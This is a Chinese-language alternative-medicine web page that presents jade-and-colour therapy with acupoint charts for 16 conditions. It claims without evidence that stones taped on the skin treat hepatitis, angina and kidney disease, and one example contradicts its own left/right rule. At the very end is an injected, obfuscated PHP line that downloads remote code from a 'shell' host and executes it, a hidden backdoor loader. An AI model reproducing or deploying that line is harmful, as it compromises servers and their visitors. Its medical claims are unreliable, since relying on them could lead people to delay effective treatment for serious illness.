收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 磁玉色療法 臨床取穴標準
磁玉色療法 臨床取穴標準 列印 E-mail

色療與玉石療效果加乘

        只要有中國人的地方,「玉」就無所不在!數千年來,「玉」在中國傳統生活中一直扮演著相當重要的角色,出土文物中,除了兵器、陶瓷器外,最多的就是各類玉器製品。玉,到底有著甚麼樣神奇的力量,讓它可以如此深入生活並傳延千年?我想,在每一塊玉裡蘊藏的神秘能量,就是答案!

        根據中國古老傳說,玉器具有「驅邪、避凶」的作用,用「玉」獨具的能量來趨吉避凶的事時有所聞;但用玉石的能量來治病的案例,卻未見任何具體文獻記載。「玉」既然具有如此好用的能量,如何運用玉石來趨吉避凶,進而達到保健養生與治療疾病的功效,絕對值得我們探討。

        對於各種寶石所具有的能量,全世界各地都有不同的看法,對人體產生的效用也不盡然相同。透過德國傅爾電針(EVA)(Electro-Acupuncture of Dr.Voll)的檢測,在數千人的體質比對中,選出五種對人體有益的寶石,其中「玉」是和人體最麻吉的寶石,由此可見「玉」的超人氣,絕對令人無法擋!

除了玉石之外,我發現五行的顏色與人體經絡和臟器有密切的關係,我以五種色紙去跟患者的經絡穴道對比,亦即只用色療來減輕疾病症狀,甚而治癒疾病,治療成效不錯。

        所以,我進而將「色療」與「寶石療」相互結合,即是以「玉」為主角,結合顏色與五行觀念,以不同質地、不同顏色的玉石──青玉、赤玉、黃玉、白玉、黑玉來治療疾病。「色療」與「寶石療」發揮了相得益彰的效果,療效令人驚訝!

精準取穴善用磁玉石療法

        如何運用「色療」與「寶石療」來治病?首先必須瞭解中醫理論中的取穴原則。
一、不通則痛,通則不痛。此處的「通」指的是氣的通暢與否;氣的通暢與否,正代表著經脈是否受損。

二、取穴時,每人穴位落點均略有不同,因此在穴位附近輕按,最痛點則為穴位所在處,此即阿是穴;以痛為俞有異曲同工之意。

三、「補瀉」是中醫處理病變最重要的方式,而針灸的補瀉方式,各派別醫師均有不同的說法。事實上,人體的能量是由左側進入人體、右側離開人體,因此,「補」是用人體左側的穴道,而「瀉」是用人體右側的穴道。

        在臨床治療上,我舉幾個簡單的例子來說明:如子宮下垂、夜尿等屬腎虛症,左側三陰交壓痛感強;此時只要將黑色玉石貼在患者左側三陰交,即可有效減緩疾病。又如泌尿道感染、黃帶等屬腎實症,則右側三陰交壓痛感強;此時只要將黑色玉石貼在患者左側三陰交,即可有效緩解病症。

下痛感較重側為主穴,左補右瀉。當補瀉理論確定後,則考慮取穴標準:本經補瀉,虛者補其母,實者瀉其子。

例一:
急性肝炎,屬肝實症。
(1)瀉肝火(本經)        青   右   太沖。
(2)瀉心火(實者瀉其子心) 紅   右   內關。

例二:腎功能不佳,導致失眠=腎虛導致心實症(心腎不交)
(1)補腎虛(本經)      黑   左   三陰交。
(2)補肺(虛者補其母)  白   左   曲池。
(3)瀉心火(因陰虛火旺)紅   右   內關。


16個臨床常見症狀處理方式

1.頭抽痛、漲痛、暈痛,腎陰虛。
(1)補腎虛(本經)      左   黑    三陰交。
(2)補肺(虛者補其母)  左   白    魚際。
(3)瀉心火(因陰虛火旺)右   紅    內關。

2.感冒引起的頭痛,屬肺實症。
(1)瀉肺火(本經)        右    白    魚際。
(2)瀉腎水(實者瀉其子)  右    黑    三陰交。
(3)瀉肝火(太陽病入少陽)右    青    太沖。

3. 眼睛酸澀、流淚、視力模糊。
(1)瀉肝火(本經)          右    青     太沖。
(2)瀉心火(實者瀉其子)    右    紅     內關。
(3)補腎水(因水不足以榮木)左    黑    三陰交。

4.耳鳴重聽。
(1)補腎虛(本經)    左   黑    三陰交。
(2)補肺(虛者補其母)左   白    魚際。

5.久咳、老人咳。
(1)補肺虛(本經)    左    白    魚際或中府。
(2)補脾(虛者補其母)左    黃    足三里。
(3)滋腎陰            左    黑    三陰交。

6.胸悶、心絞痛。
(1)補心虛(本經)     左    紅     內關。
(2)補肝(虛者補其母) 左    青    陽陵泉。
(3)氣會膻中(血管阻塞表血氣不通)紅  膻中。
(4)以痛為俞  左    青     胸鎖乳突肌痛點。
               左    黑     膻中左側一吋。

7.胃痛(急性)為實症。
(1)瀉胃實症(本經)    右   黃    足三里。
(2)瀉肺(實者瀉其子  )右   白    曲池。
(3)補腎陰(以水反克土)左   黑    三陰交。

8.胃痛(慢性)為虛症。
(1)補胃虛              左    黃     足三里。
(2)補心(虛者補其母)  左    紅     內關。
(3)瀉肝火(以防木克土)右    青     太沖。

9.急性腸炎拉肚子(12小時=實症)。
(1)瀉肺火              右    白     曲池。
(2)瀉腎水(實者瀉其子)右    黑     三陰交。
(3)補肝(以防金克木)  左    青     太沖。

10.腸炎拉肚子(二日後=虛症)。
(1)補肺虛              左    白     曲池。
(2)補脾土(虛者補其母)左    黃     足三里。
(3)補腎虛(腎主先天氣)左    黑      三陰交(免疫功能)。

11.痛經,子宮收縮不良,月經量多或量少。
(1)補腎虛                左    黑     三陰交。
(2)補肺虛                左    白     曲池。
(3)補肝木(水不足以榮木)左    青     陽陵泉。

12.黃帶、白帶。
(1)瀉腎實症          右    黑     三陰交。
(2)瀉肝(實者瀉其子)右    青    太沖。
(3)補脾土(以土克水)左    黃    公孫。

13.上背單側痛,實症。
(1)同側胸鎖乳突肌痛點        同側  青    痛點。
(2)筋會陽陵泉                右    青     陽陵泉。
(3)水不足以榮木(故易肌肉痛)左    黑     三陰交。

14.下背單側痛。
(1)尋找下背                  痛點    青     痛點。
(2)筋會陽陵泉                右      青     陽陵泉。
(3)水不足以榮木(故易肌肉痛)左      黑     三陰交。

15.下背雙側痛。
(1)腎虛(本經)      左     黑    三陰交。
(2)補肺(虛者補其母)左     白    曲池。
(3)平肝              右     青    陽陵泉。

16.五十肩。
(1)同側胸鎖乳突肌 同側   青    痛點。
(2)同側天宗穴     同側   紅    痛點。
(3)同側肩前痛點   同側   白    痛點。

 
下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));